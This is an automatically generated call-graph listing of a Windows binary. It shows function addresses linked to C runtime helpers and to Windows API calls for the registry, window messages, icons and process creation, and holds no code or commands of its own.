15126 6e2f4cc9 __DllMainCRTStartup@12 15125->15126 15126->15118 15127->15122 15131 6e2f52c2 15128->15131 15130 6e2f41df __FrameHandler3::FrameUnwindToState 15130->15102 15132 6e2f52d1 __FrameHandler3::FrameUnwindToState 15131->15132 15133 6e2f52de 15132->15133 15134 6e2f83f6 __FrameHandler3::FrameUnwindToState 5 API calls 15132->15134 15133->15130 15134->15133 15136 6e2f9e56 __FrameHandler3::FrameUnwindToState 15135->15136 15137 6e2f6746 _unexpected 39 API calls 15136->15137 15138 6e2f9e5f 15137->15138 15145 6e2f9ea5 15138->15145 15148 6e2f523e EnterCriticalSection 15138->15148 15140 6e2f9e7d 15149 6e2f9ecb 15140->15149 15145->15005 15146 6e2f4f3d __FrameHandler3::FrameUnwindToState 39 API calls 15147 6e2f9eca 15146->15147 15148->15140 15150 6e2f9ed9 _unexpected 15149->15150 15152 6e2f9e8e 15149->15152 15151 6e2f9bfe _unexpected 14 API calls 15150->15151 15150->15152 15151->15152 15153 6e2f9eaa 15152->15153 15156 6e2f5286 LeaveCriticalSection 15153->15156 15155 6e2f9ea1 15155->15145 15155->15146 15156->15155 15158 6e2f6746 _unexpected 39 API calls 15157->15158 15159 6e2f789d 15158->15159 15162 6e2f77b0 15159->15162 15163 6e2f77bc __FrameHandler3::FrameUnwindToState 15162->15163 15169 6e2f77d6 15163->15169 15173 6e2f523e EnterCriticalSection 15163->15173 15165 6e2f77dd 15165->15009 15167 6e2f4f3d __FrameHandler3::FrameUnwindToState 39 API calls 15170 6e2f784f 15167->15170 15168 6e2f7812 15174 6e2f782f 15168->15174 15169->15165 15169->15167 15171 6e2f77e6 15171->15168 15172 6e2f5602 __freea 14 API calls 15171->15172 15172->15168 15173->15171 15177 6e2f5286 LeaveCriticalSection 15174->15177 15176 6e2f7836 15176->15169 15177->15176 15179 6e2f8371 _unexpected 5 API calls 15178->15179 15180 6e2f8254 15179->15180 15180->14756 15182 6e2f618a 15181->15182 15183 6e2f6170 15181->15183 15185 6e2f6191 15182->15185 15186 6e2f61b0 15182->15186 15199 6e2f62f2 15183->15199 15188 6e2f617a 15185->15188 15203 6e2f630c 15185->15203 15208 6e2f7c4a 15186->15208 15188->14618 15188->14619 15189 6e2f61bf 15191 6e2f61c6 GetLastError 15189->15191 15193 6e2f61ec 15189->15193 15195 6e2f630c 15 API calls 15189->15195 15192 6e2f5595 __dosmaperr 14 API calls 15191->15192 15194 6e2f61d2 15192->15194 15193->15188 15196 6e2f7c4a __strnicoll MultiByteToWideChar 15193->15196 15197 6e2f55ef __dosmaperr 14 API calls 15194->15197 15195->15193 15198 6e2f6203 15196->15198 15197->15188 15198->15188 15198->15191 15200 6e2f62fd 15199->15200 15201 6e2f6305 15199->15201 15202 6e2f5602 __freea 14 API calls 15200->15202 15201->15188 15202->15201 15204 6e2f62f2 14 API calls 15203->15204 15205 6e2f631a 15204->15205 15211 6e2f634b 15205->15211 15235 6e2f7bb2 15208->15235 15214 6e2f9163 15211->15214 15215 6e2f91a1 15214->15215 15220 6e2f9171 _unexpected 15214->15220 15216 6e2f55ef __dosmaperr 14 API calls 15215->15216 15218 6e2f632b 15216->15218 15217 6e2f918c HeapAlloc 15217->15218 15217->15220 15218->15188 15220->15215 15220->15217 15221 6e2f8989 15220->15221 15224 6e2f89b5 15221->15224 15225 6e2f89c1 __FrameHandler3::FrameUnwindToState 15224->15225 15230 6e2f523e EnterCriticalSection 15225->15230 15227 6e2f89cc __FrameHandler3::FrameUnwindToState 15231 6e2f8a03 15227->15231 15230->15227 15234 6e2f5286 LeaveCriticalSection 15231->15234 15233 6e2f8994 15233->15220 15234->15233 15236 6e2f7bc3 MultiByteToWideChar 15235->15236 15236->15189 15261 6e2f57cf 15237->15261 15241 6e2f62b3 39 API calls 15240->15241 15242 6e2f9a29 15241->15242 15243 6e2f6214 17 API calls 15242->15243 15244 6e2f9a36 15243->15244 15246 6e2f9a9d 15244->15246 15247 6e2f62b3 39 API calls 15244->15247 15245 6e2f9aa9 15249 6e2f9ab8 15245->15249 15251 6e2f5602 __freea 14 API calls 15245->15251 15246->15245 15248 6e2f5602 __freea 14 API calls 15246->15248 15250 6e2f9a42 15247->15250 15248->15245 15253 6e2f5b2f 15249->15253 15254 6e2f5602 __freea 14 API calls 15249->15254 15252 6e2f6214 17 API calls 15250->15252 15251->15249 15255 6e2f9a4f 15252->15255 15253->14650 15253->14651 15253->14652 15254->15253 15255->15246 15256 6e2f9a79 CreateProcessW 15255->15256 15257 6e2f62b3 39 API calls 15255->15257 15256->15246 15258 6e2f9a60 15257->15258 15259 6e2f6214 17 API calls 15258->15259 15260 6e2f9a6d 15259->15260 15260->15246 15260->15256 15262 6e2f57db __FrameHandler3::FrameUnwindToState 15261->15262 15269 6e2f523e EnterCriticalSection 15262->15269 15264 6e2f57e9 15270 6e2f5c29 15264->15270 15269->15264 15271 6e2f5c52 15270->15271 15272 6e2f5c7e 15271->15272 15273 6e2f5c90 15271->15273 15274 6e2f55ef __dosmaperr 14 API calls 15272->15274 15275 6e2f6a31 _unexpected 14 API calls 15273->15275 15276 6e2f57f6 15274->15276 15277 6e2f5ca4 15275->15277 15282 6e2f581e 15276->15282 15278 6e2f55ef __dosmaperr 14 API calls 15277->15278 15279 6e2f5cb2 15277->15279 15278->15279 15280 6e2f5602 __freea 14 API calls 15279->15280 15281 6e2f5d57 15280->15281 15281->15276 15285 6e2f5286 LeaveCriticalSection 15282->15285 15284 6e2f5807 15284->14638 15284->14639 15285->15284 15287 6e2f546c __strnicoll 15286->15287 15290 6e2f5491 15287->15290 15289 6e2f5484 __strnicoll 15289->14690 15291 6e2f54a8 15290->15291 15292 6e2f54a1 15290->15292 15297 6e2f54b6 15291->15297 15305 6e2f52e9 15291->15305 15301 6e2f5030 GetLastError 15292->15301 15295 6e2f54dd 15296 6e2f551e __strnicoll 11 API calls 15295->15296 15295->15297 15298 6e2f550d 15296->15298 15297->15289 15299 6e2f545a __strnicoll 29 API calls 15298->15299 15300 6e2f551a 15299->15300 15300->15289 15302 6e2f5049 15301->15302 15308 6e2f6948 15302->15308 15306 6e2f530d 15305->15306 15307 6e2f52f4 GetLastError SetLastError 15305->15307 15306->15295 15307->15295 15309 6e2f695b 15308->15309 15310 6e2f6961 15308->15310 15311 6e2f8530 _unexpected 6 API calls 15309->15311 15312 6e2f856f _unexpected 6 API calls 15310->15312 15329 6e2f5065 SetLastError 15310->15329 15311->15310 15313 6e2f697b 15312->15313 15314 6e2f6a31 _unexpected 14 API calls 15313->15314 15313->15329 15315 6e2f698b 15314->15315 15316 6e2f69a8 15315->15316 15317 6e2f6993 15315->15317 15318 6e2f856f _unexpected 6 API calls 15316->15318 15319 6e2f856f _unexpected 6 API calls 15317->15319 15320 6e2f69b4 15318->15320 15321 6e2f699f 15319->15321 15322 6e2f69b8 15320->15322 15323 6e2f69c7 15320->15323 15324 6e2f5602 __freea 14 API calls 15321->15324 15325 6e2f856f _unexpected 6 API calls 15322->15325 15326 6e2f6548 _unexpected 14 API calls 15323->15326 15324->15329 15325->15321 15327 6e2f69d2 15326->15327 15328 6e2f5602 __freea 14 API calls 15327->15328 15328->15329 15329->15291 15330 6e2f42c6 15362 6e2f57b1 15330->15362 15333 6e2f4301 15335 6e2f4339 15333->15335 15336 6e2f4305 15333->15336 15334 6e2f43d6 15339 6e2f551e __strnicoll 11 API calls 15334->15339 15340 6e2f43a2 15335->15340 15344 6e2f55ef __dosmaperr 14 API calls 15335->15344 15337 6e2f430b 15336->15337 15338 6e2f4318 15336->15338 15341 6e2f5602 __freea 14 API calls 15337->15341 15342 6e2f636a 44 API calls 15338->15342 15343 6e2f43e0 15339->15343 15348 6e2f5602 __freea 14 API calls 15340->15348 15351 6e2f4310 15341->15351 15345 6e2f4320 15342->15345 15346 6e2f4356 15344->15346 15349 6e2f5602 __freea 14 API calls 15345->15349 15347 6e2f55ef __dosmaperr 14 API calls 15346->15347 15350 6e2f435d 15347->15350 15348->15351 15349->15351 15354 6e2f55ef __dosmaperr 14 API calls 15350->15354 15352 6e2f1015 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15351->15352 15353 6e2f43d4 15352->15353 15355 6e2f4377 15354->15355 15356 6e2f439d 15355->15356 15358 6e2f55ef __dosmaperr 14 API calls 15355->15358 15361 6e2f437c 15355->15361 15357 6e2f55ef __dosmaperr 14 API calls 15356->15357 15357->15340 15360 6e2f438a 15358->15360 15359 6e2f5602 __freea 14 API calls 15359->15351 15360->15356 15360->15361 15361->15359 15365 6e2f563c 15362->15365 15366 6e2f5648 __FrameHandler3::FrameUnwindToState 15365->15366 15373 6e2f523e EnterCriticalSection 15366->15373 15368 6e2f5653 15374 6e2f56a1 15368->15374 15373->15368 15375 6e2f56c3 15374->15375 15376 6e2f56b0 15374->15376 15375->15376 15379 6e2f56d6 15375->15379 15377 6e2f55ef __dosmaperr 14 API calls 15376->15377 15378 6e2f56b5 15377->15378 15380 6e2f550e __strnicoll 29 API calls 15378->15380 15395 6e2f5744 15379->15395 15382 6e2f566f 15380->15382 15392 6e2f5698 15382->15392 15383 6e2f56df __FrameHandler3::FrameUnwindToState 15383->15382 15384 6e2f571b 15383->15384 15385 6e2f570a 15383->15385 15387 6e2f4ee3 ___std_exception_copy 29 API calls 15384->15387 15386 6e2f55ef __dosmaperr 14 API calls 15385->15386 15386->15382 15388 6e2f5726 15387->15388 15388->15382 15389 6e2f5737 15388->15389 15390 6e2f551e __strnicoll 11 API calls 15389->15390 15391 6e2f5743 15390->15391 15509 6e2f5286 LeaveCriticalSection 15392->15509 15394 6e2f42f1 15394->15333 15394->15334 15396 6e2f5751 15395->15396 15398 6e2f57a4 15396->15398 15399 6e2f9467 15396->15399 15398->15383 15400 6e2f947b 15399->15400 15401 6e2f9475 15399->15401 15417 6e2f9490 15400->15417 15404 6e2fbee9 15401->15404 15405 6e2fbf31 15401->15405 15407 6e2fbeef 15404->15407 15408 6e2fbf0c 15404->15408 15437 6e2fbf47 15405->15437 15410 6e2f55ef __dosmaperr 14 API calls 15407->15410 15412 6e2f55ef __dosmaperr 14 API calls 15408->15412 15416 6e2fbf2a 15408->15416 15409 6e2fbeff 15409->15396 15411 6e2fbef4 15410->15411 15413 6e2f550e __strnicoll 29 API calls 15411->15413 15414 6e2fbf1b 15412->15414 15413->15409 15415 6e2f550e __strnicoll 29 API calls 15414->15415 15415->15409 15416->15396 15418 6e2f6231 __strnicoll 39 API calls 15417->15418 15419 6e2f94a6 15418->15419 15420 6e2f94c2 15419->15420 15421 6e2f94d9 15419->15421 15423 6e2f948b 15419->15423 15422 6e2f55ef __dosmaperr 14 API calls 15420->15422 15425 6e2f94f4 15421->15425 15426 6e2f94e2 15421->15426 15424 6e2f94c7 15422->15424 15423->15396 15429 6e2f550e __strnicoll 29 API calls 15424->15429 15427 6e2f9514 15425->15427 15428 6e2f9501 15425->15428 15430 6e2f55ef __dosmaperr 14 API calls 15426->15430 15455 6e2fc2b1 15427->15455 15432 6e2fbf47 __strnicoll 39 API calls 15428->15432 15429->15423 15431 6e2f94e7 15430->15431 15434 6e2f550e __strnicoll 29 API calls 15431->15434 15432->15423 15434->15423 15436 6e2f55ef __dosmaperr 14 API calls 15436->15423 15438 6e2fbf57 15437->15438 15439 6e2fbf71 15437->15439 15440 6e2f55ef __dosmaperr 14 API calls 15438->15440 15441 6e2fbf79 15439->15441 15442 6e2fbf90 15439->15442 15443 6e2fbf5c 15440->15443 15444 6e2f55ef __dosmaperr 14 API calls 15441->15444 15445 6e2fbf9c 15442->15445 15446 6e2fbfb3 15442->15446 15447 6e2f550e __strnicoll 29 API calls 15443->15447 15448 6e2fbf7e 15444->15448 15449 6e2f55ef __dosmaperr 14 API calls 15445->15449 15450 6e2f6231 __strnicoll 39 API calls 15446->15450 15454 6e2fbf67 15446->15454 15447->15454 15451 6e2f550e __strnicoll 29 API calls 15448->15451 15452 6e2fbfa1 15449->15452 15450->15454 15451->15454 15453 6e2f550e __strnicoll 29 API calls 15452->15453 15453->15454 15454->15409 15456 6e2f6231 __strnicoll 39 API calls 15455->15456 15457 6e2fc2c4 15456->15457 15460 6e2fc012 15457->15460 15462 6e2fc046 __strnicoll 15460->15462 15461 6e2f1015 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 15463 6e2f952a 15461->15463 15464 6e2fc0c6 15462->15464 15465 6e2fc2aa 15462->15465 15467 6e2fc0b3 GetCPInfo 15462->15467 15472 6e2fc0ca 15462->15472 15463->15423 15463->15436 15466 6e2f7c4a __strnicoll MultiByteToWideChar 15464->15466 15464->15472 15469 6e2fc14c 15466->15469 15467->15464 15467->15472 15468 6e2fc29e 15470 6e2fa6c5 __freea 14 API calls 15468->15470 15469->15468 15471 6e2f9163 __strnicoll 15 API calls 15469->15471 15469->15472 15473 6e2fc173 __alloca_probe_16 15469->15473 15470->15472 15471->15473 15472->15461 15472->15465 15473->15468 15474 6e2f7c4a __strnicoll MultiByteToWideChar 15473->15474 15475 6e2fc1bf 15474->15475 15475->15468 15476 6e2f7c4a __strnicoll MultiByteToWideChar 15475->15476 15477 6e2fc1db 15476->15477 15477->15468 15478 6e2fc1e9 15477->15478 15479 6e2fc24c 15478->15479 15481 6e2f9163 __strnicoll 15 API calls 15478->15481 15484 6e2fc202 __alloca_probe_16 15478->15484 15493 6e2fa6c5 15479->15493 15481->15484 15483 6e2fa6c5 __freea 14 API calls 15483->15472 15484->15479 15485 6e2f7c4a __strnicoll MultiByteToWideChar 15484->15485 15486 6e2fc245 15485->15486 15486->15479 15487 6e2fc26e 15486->15487 15497 6e2f8455 15487->15497 15490 6e2fa6c5 __freea 14 API calls 15491 6e2fc28e 15490->15491 15492 6e2fa6c5 __freea 14 API calls 15491->15492 15492->15472 15494 6e2fa6e2 15493->15494 15495 6e2fa6d1 15493->15495 15494->15483 15495->15494 15496 6e2f5602 __freea 14 API calls 15495->15496 15496->15494 15503 6e2f8258 15497->15503 15500 6e2f8466 15500->15490 15502 6e2f84a6 CompareStringW 15502->15500 15504 6e2f8371 _unexpected 5 API calls 15503->15504 15505 6e2f826e 15504->15505 15505->15500 15506 6e2f8659 15505->15506 15507 6e2f828c __strnicoll 5 API calls 15506->15507 15508 6e2f8664 __strnicoll 15507->15508 15508->15502 15509->15394 15510 6e2f1000 15511 6e2f100a 15510->15511 15514 6e2f42b0 15511->15514 15515 6e2f40d0 __FrameHandler3::FrameUnwindToState 21 API calls 15514->15515 15516 6e2f1014 15515->15516 15517 d3ee23 15532 d3fd98 15517->15532 15519 d3ee2f GetStartupInfoW 15520 d3ee4c 15519->15520 15521 d3ee61 15520->15521 15522 d3ee68 Sleep 15520->15522 15523 d3ee80 _amsg_exit 15521->15523 15525 d3ee8a 15521->15525 15522->15520 15523->15525 15524 d3eecc _initterm 15527 d3eee7 __IsNonwritableInCurrentImage 15524->15527 15525->15524 15526 d3eead 15525->15526 15525->15527 15527->15526 15529 d3efd3 15527->15529 15530 d3ef84 exit 15527->15530 15533 d400d1 15527->15533 15529->15526 15531 d3efdc _cexit 15529->15531 15530->15527 15531->15526 15532->15519 15534 d400dc #1569 15533->15534 15535 d2fce0 16 API calls 15536 d2fe0b GetProcAddress 15535->15536 15537 d2fe2c 15535->15537 15539 d2fe25 FreeLibrary 15536->15539 15540 d2fe1b 15536->15540 15542 d2f616 15537->15542 15539->15537 15540->15539 15610 d3f415 15542->15610 15544 d2f625 #540 StringFromGUID2 SendMessageW 15611 d3d67d 15544->15611 15548 d3d67d 9 API calls 15549 d2f6ed #6195 15548->15549 15551 d2f71b 15549->15551 15552 d2f973 15549->15552 15553 d2f944 15551->15553 15555 d2f7f7 15551->15555 15556 d2f72d 15551->15556 15554 d3d67d 9 API calls 15552->15554 15557 d3d67d 9 API calls 15553->15557 15558 d2f9c5 #861 #2756 15554->15558 15561 d3d67d 9 API calls 15555->15561 15559 d2fc33 15556->15559 15560 d2f736 #3087 #2634 15556->15560 15557->15552 15566 d2f9f3 #2756 15558->15566 15567 d2fa1b SendMessageW 15558->15567 15625 d2f090 17 API calls 15559->15625 15563 d3d67d 9 API calls 15560->15563 15565 d2f826 15561->15565 15570 d2f77a #861 15563->15570 15572 d2f830 #861 15565->15572 15573 d2f84c #861 15565->15573 15566->15567 15568 d2fa04 SendMessageW 15566->15568 15569 d3d67d 9 API calls 15567->15569 15576 d2fa82 #2634 15568->15576 15578 d2fa6c 15569->15578 15584 d3d67d 9 API calls 15570->15584 15571 d2fc3a 15626 d3020e 15571->15626 15574 d2f863 15572->15574 15575 d2f848 15572->15575 15577 d2f858 #2634 15573->15577 15581 d3d67d 9 API calls 15574->15581 15575->15577 15583 d3d67d 9 API calls 15576->15583 15577->15574 15578->15576 15582 d2fa70 #861 15578->15582 15587 d2f896 15581->15587 15582->15576 15588 d2facf 15583->15588 15589 d2f7c8 #861 #2634 15584->15589 15586 d3f3c4 4 API calls 15590 d2fc5a 15586->15590 15591 d2f89e lstrcmpiW 15587->15591 15605 d2f8b4 SendMessageW 15587->15605 15592 d2fad7 lstrcmpiW 15588->15592 15606 d2faed SendMessageW 15588->15606 15596 d2fc28 #2634 15589->15596 15594 d2f8bb lstrcmpiW 15591->15594 15591->15605 15595 d2faf4 lstrcmpiW 15592->15595 15592->15606 15599 d2f8d8 lstrcmpiW 15594->15599 15594->15605 15600 d2fb11 lstrcmpiW 15595->15600 15595->15606 15596->15559 15602 d2f8f5 lstrcmpiW 15599->15602 15599->15605 15603 d2fb2e lstrcmpiW 15600->15603 15600->15606 15602->15605 15603->15606 15605->15553 15618 d3d605 15606->15618 15607 d2fbd0 SendMessageW 15609 d2fbe5 6 API calls 15607->15609 15608 d2fbb7 SendMessageW 15608->15609 15609->15596 15610->15544 15640 d3d473 StringFromGUID2 wsprintfW 15611->15640 15616 d3f3a0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 15617 d2f69f #861 15616->15617 15617->15548 15646 d3d2f7 15618->15646 15621 d3d6f5 3 API calls 15622 d3d66c 15621->15622 15623 d3f3a0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 15622->15623 15624 d2fbab 15623->15624 15624->15607 15624->15608 15625->15571 15627 d3036b 16 API calls 15626->15627 15628 d30229 15626->15628 15629 d3040d #3087 #6211 15627->15629 15630 d30342 #3087 #6211 #3087 #6211 15628->15630 15631 d30232 15628->15631 15633 d30420 15629->15633 15632 d30315 #3087 #6211 #3087 #6211 15630->15632 15634 d302eb #3087 #6211 #3087 #6211 15631->15634 15635 d3023b 15631->15635 15637 d30296 8 API calls 15632->15637 15638 d2fc41 #6330 #800 15633->15638 15639 d30429 8 API calls 15633->15639 15634->15632 15635->15633 15636 d30244 8 API calls 15635->15636 15636->15637 15637->15629 15638->15586 15639->15638 15641 d3f3a0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 15640->15641 15642 d3d4c9 15641->15642 15643 d3d6f5 RegOpenKeyExW 15642->15643 15644 d3d6e4 15643->15644 15645 d3d71a RegQueryValueExW RegCloseKey 15643->15645 15644->15616 15645->15644 15647 d3d67d 9 API calls 15646->15647 15648 d3d34e wsprintfW 15647->15648 15649 d3d370 lstrcatW lstrcatW 15648->15649 15650 d3d384 15648->15650 15649->15650 15651 d3f3a0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 15650->15651 15652 d3d393 15651->15652 15652->15621 15653 d2dba0 15654 d2dbc4 15653->15654 15655 d2e15d 15653->15655 15657 d2dbd3 #6195 #1143 LoadIconW SendMessageW #6195 15654->15657 15658 d2dc21 #1662 lstrcmpW 15654->15658 15656 d3f3a0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 15655->15656 15659 d2e16a 15656->15659 15748 d2e409 SendMessageW 15657->15748 15661 d2dc41 #6195 #6195 #1143 LoadIconW SendMessageW 15658->15661 15662 d2dc9d memcmp 15658->15662 15753 d39b32 15661->15753 15663 d2de59 StringFromGUID2 #6195 #6195 15662->15663 15664 d2dcbe 15662->15664 15670 d2deb0 15663->15670 15671 d2de90 15663->15671 15668 d2dce1 #6195 15664->15668 15669 d2dccf #6195 15664->15669 15675 d2dcef #1143 LoadIconW SendMessageW #6195 15668->15675 15669->15675 15673 d2ded2 15670->15673 15674 d2deb5 15670->15674 15676 d39b32 219 API calls 15671->15676 15679 d2def7 15673->15679 15680 d2ded7 15673->15680 15678 d39b32 219 API calls 15674->15678 15681 d2dd32 RegOpenKeyExW 15675->15681 15682 d2dda6 15675->15682 15683 d2de9b 15676->15683 15687 d2dec0 15678->15687 15691 d2df00 15679->15691 15692 d2e113 15679->15692 15688 d39b32 219 API calls 15680->15688 15689 d2dd92 15681->15689 15690 d2dd53 #6195 #1143 LoadIconW SendMessageW RegCloseKey 15681->15690 15684 d2dde7 15682->15684 15685 d2ddab 15682->15685 15693 d2e466 18 API calls 15683->15693 15697 d2e409 10 API calls 15684->15697 15695 d39b32 219 API calls 15685->15695 15686 d2e156 #2644 15686->15655 15696 d2e466 18 API calls 15687->15696 15698 d2dee2 15688->15698 15699 d39b32 219 API calls 15689->15699 15690->15689 15691->15692 15701 d39b32 219 API calls 15691->15701 15700 d39b32 219 API calls 15692->15700 15694 d2dea2 #1143 LoadIconW 15693->15694 15709 d2e10f SendMessageW 15694->15709 15703 d2ddb6 15695->15703 15696->15694 15704 d2ddee lstrcmpW 15697->15704 15705 d2e466 18 API calls 15698->15705 15706 d2dd9d 15699->15706 15707 d2e129 15700->15707 15708 d2df14 15701->15708 15710 d2e466 18 API calls 15703->15710 15711 d2de06 #1143 LoadIconW SendMessageW 15704->15711 15712 d2de2b lstrcmpW 15704->15712 15705->15694 15713 d2e466 18 API calls 15706->15713 15714 d2e466 18 API calls 15707->15714 15964 d2c6a6 LoadCursorW SetCursor 15708->15964 15709->15686 15717 d2ddbd #1143 LoadIconW SendMessageW 15710->15717 15711->15712 15712->15686 15718 d2de41 #1143 LoadIconW 15712->15718 15719 d2dda4 15713->15719 15714->15694 15717->15704 15718->15709 15719->15704 15720 d2df2b 15967 d30b66 LoadCursorW SetCursor 15720->15967 15722 d2df45 15723 d2f616 124 API calls 15722->15723 15724 d2df5f 15723->15724 15970 d2cb16 15724->15970 15729 d2dfc5 RegQueryValueW 15730 d2e079 15729->15730 15733 d2dff6 15729->15733 16023 d2d944 RegQueryValueW 15730->16023 15735 d2e057 #1165 ExtractIconW 15733->15735 15736 d2e029 lstrcpyW wcsrchr 15733->15736 15734 d2e0fe RegCloseKey 15734->15692 15734->15709 15735->15730 15735->15734 15736->15735 15738 d2e052 15736->15738 15737 d2d944 10 API calls 15739 d2e0a0 15737->15739 15738->15735 15739->15734 15740 d2d944 10 API calls 15739->15740 15741 d2e0b7 15740->15741 15741->15734 15742 d2d944 10 API calls 15741->15742 15743 d2e0ce 15742->15743 15743->15734 15744 d2d944 10 API calls 15743->15744 15745 d2e0e5 15744->15745 15745->15734 15746 d2d944 10 API calls 15745->15746 15747 d2e0fc 15746->15747 15747->15734 15749 d2dc1c 15748->15749 15750 d2e428 SendMessageW 15748->15750 15749->15655 16032 d2e583 15750->16032 16045 d3f6e0 15753->16045 15757 d39bb0 lstrcmpW 15758 d39bc2 RegOpenKeyExW 15757->15758 15759 d39c2f 15757->15759 15760 d39be4 #538 15758->15760 15761 d39c29 SendMessageW #2644 15758->15761 15762 d39dc2 15759->15762 15763 d39c3b wsprintfW 15759->15763 16048 d39634 15760->16048 15770 d3f3a0 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 15761->15770 15768 d39e5b StringFromGUID2 15762->15768 15773 d39de9 15762->15773 15766 d3de06 2 API calls 15763->15766 15769 d39c8a 15766->15769 15767 d39c0e #800 RegCloseKey 15767->15761 15771 d3a070 15768->15771 15772 d39e9f RegOpenKeyExW 15768->15772 15774 d39cef 15769->15774 15775 d39c9e #538 #538 15769->15775 15776 d2dc91 15770->15776 15778 d3a264 15771->15778 15779 d3a079 RegOpenKeyExW 15771->15779 15772->15761 15777 d39ec5 RegQueryValueExW 15772->15777 15773->15761 15780 d39df2 RegOpenKeyExW 15773->15780 15782 d39cfe #800 15774->15782 15783 d39d0c 15774->15783 16075 d39419 15775->16075 15952 d2e466 SendMessageW 15776->15952 15784 d39f21 wsprintfW 15777->15784 15785 d39efe wsprintfW 15777->15785 15787 d3ab18 RegOpenKeyExW 15778->15787 15795 d3a275 RegQueryValueW wsprintfW 15778->15795 15779->15761 15786 d3a09f RegQueryValueExW 15779->15786 15780->15761 15788 d39e19 #538 15780->15788 15782->15783 15789 d39d20 SendMessageW wsprintfW RegOpenKeyExW 15783->15789 15790 d39d15 #800 15783->15790 15791 d39f3b 15784->15791 15785->15791 15792 d3a0f7 wsprintfW 15786->15792 15793 d3a0d8 wsprintfW 15786->15793 15787->15761 15794 d3ab3e RegQueryValueExW wsprintfW 15787->15794 15796 d39634 30 API calls 15788->15796 15789->15761 15797 d39d82 #538 15789->15797 15790->15789 15798 d3de06 2 API calls 15791->15798 15799 d3a10d 15792->15799 15793->15799 15800 d3de06 2 API calls 15794->15800 15801 d3de06 2 API calls 15795->15801 15802 d39e47 #800 15796->15802 15803 d39634 30 API calls 15797->15803 15804 d39f4e 15798->15804 15805 d3de06 2 API calls 15799->15805 15806 d3ab9f 15800->15806 15807 d3a2d8 15801->15807 15808 d3b33d RegCloseKey 15802->15808 15809 d39dae #800 15803->15809 15810 d39f60 #538 #538 15804->15810 15819 d39fb9 15804->15819 15811 d3a120 15805->15811 15812 d3abb3 #538 #538 15806->15812 15821 d3ac0e 15806->15821 15813 d3a2ec #538 #538 15807->15813 15822 d3a34d 15807->15822 15808->15761 15814 d3b329 15809->15814 15815 d39419 6 API calls 15810->15815 15816 d3a132 #538 #538 15811->15816 15817 d3a182 15811->15817 15818 d39419 6 API calls 15812->15818 15820 d39419 6 API calls 15813->15820 15825 d3b32a SendMessageW 15814->15825 15815->15819 15826 d39419 6 API calls 15816->15826 15837 d3a191 #800 15817->15837 15838 d3a19f 15817->15838 15818->15821 15827 d39fd6 15819->15827 15828 d39fc8 #800 15819->15828 15820->15822 15829 d3ac2d 15821->15829 15830 d3ac1c #800 15821->15830 15823 d3a376 15822->15823 15824 d3a35f #800 15822->15824 15833 d3a382 #800 15823->15833 15834 d3a399 SendMessageW wsprintfW RegOpenKeyExW 15823->15834 15824->15823 15825->15808 15826->15817 15835 d39fea SendMessageW RegCloseKey wsprintfW RegOpenKeyExW 15827->15835 15836 d39fdf #800 15827->15836 15828->15827 15831 d3ac36 #800 15829->15831 15832 d3ac44 SendMessageW RegCloseKey wsprintfW RegOpenKeyExW 15829->15832 15830->15829 15831->15832 15832->15761 15842 d3acb0 #538 15832->15842 15833->15834 15834->15761 15843 d3a3f9 #538 15834->15843 15835->15761 15839 d3a052 #538 15835->15839 15836->15835 15837->15838 15840 d3a1b3 SendMessageW RegCloseKey wsprintfW RegOpenKeyExW 15838->15840 15841 d3a1a8 #800 15838->15841 15839->15771 15840->15761 15844 d3a21f #538 15840->15844 15841->15840 15845 d39634 30 API calls 15842->15845 15846 d39634 30 API calls 15843->15846 15847 d39634 30 API calls 15844->15847 15848 d3ace5 #800 SendMessageW RegQueryValueW 15845->15848 15849 d3a42f #800 SendMessageW 15846->15849 15850 d3a24f #800 15847->15850 15851 d3ae02 RegQueryValueW 15848->15851 15852 d3ad3e 15848->15852 16079 d3d057 15849->16079 15850->15825 15856 d3ae56 RegQueryValueW wsprintfW 15851->15856 15857 d3ae2f RegQueryValueW 15851->15857 15852->15851 15854 d3ad4b #537 #925 RegOpenKeyExW #800 #800 15852->15854 15858 d3adfd 15854->15858 15859 d3adad #538 15854->15859 15862 d3de06 2 API calls 15856->15862 15857->15856 15861 d3b12a RegQueryValueW 15857->15861 15858->15851 15863 d39634 30 API calls 15859->15863 15860 d3a657 15872 d3a662 RegQueryValueW 15860->15872 15861->15808 15864 d3b15c RegQueryValueW wsprintfW 15861->15864 15866 d3aeb4 15862->15866 15869 d3ade2 #800 RegCloseKey 15863->15869 15870 d3de06 2 API calls 15864->15870 15865 d3d2f7 12 API calls 15871 d3a48e RegOpenKeyExW 15865->15871 15867 d3af26 15866->15867 15868 d3aec8 #538 #538 15866->15868 15880 d3af49 15867->15880 15881 d3af38 #800 15867->15881 15873 d39419 6 API calls 15868->15873 15869->15858 15874 d3b1b4 15870->15874 15871->15860 15875 d3a4b7 15871->15875 15876 d3a68f 15872->15876 15877 d3a69d 15872->15877 15873->15867 15882 d3b222 15874->15882 15883 d3b1c8 #538 #538 15874->15883 15884 d3de06 2 API calls 15875->15884 15878 d3a720 wsprintfW RegOpenKeyExW 15876->15878 15877->15878 15879 d3a6a7 RegOpenKeyExW 15877->15879 15886 d3a8f1 RegQueryValueW 15878->15886 15887 d3a760 RegQueryValueW wsprintfW 15878->15887 15879->15878 15885 d3a6c7 #538 15879->15885 15888 d3af66 SendMessageW RegOpenKeyExW 15880->15888 15889 d3af55 #800 15880->15889 15881->15880 15892 d3b245 15882->15892 15893 d3b234 #800 15882->15893 15890 d39419 6 API calls 15883->15890 15891 d3a4d3 15884->15891 15894 d39634 30 API calls 15885->15894 15895 d3a923 wsprintfW RegOpenKeyExW 15886->15895 15896 d3aaee RegCloseKey SendMessageW 15886->15896 15897 d3de06 2 API calls 15887->15897 15898 d3b111 SendMessageW 15888->15898 15899 d3afa8 RegQueryValueW 15888->15899 15889->15888 15890->15882 15900 d3a4e7 #538 #538 15891->15900 15901 d3a543 15891->15901 15903 d3b251 #800 15892->15903 15904 d3b25c 6 API calls 15892->15904 15893->15892 15905 d3a705 #800 RegCloseKey 15894->15905 15895->15896 15906 d3a967 RegQueryValueW wsprintfW 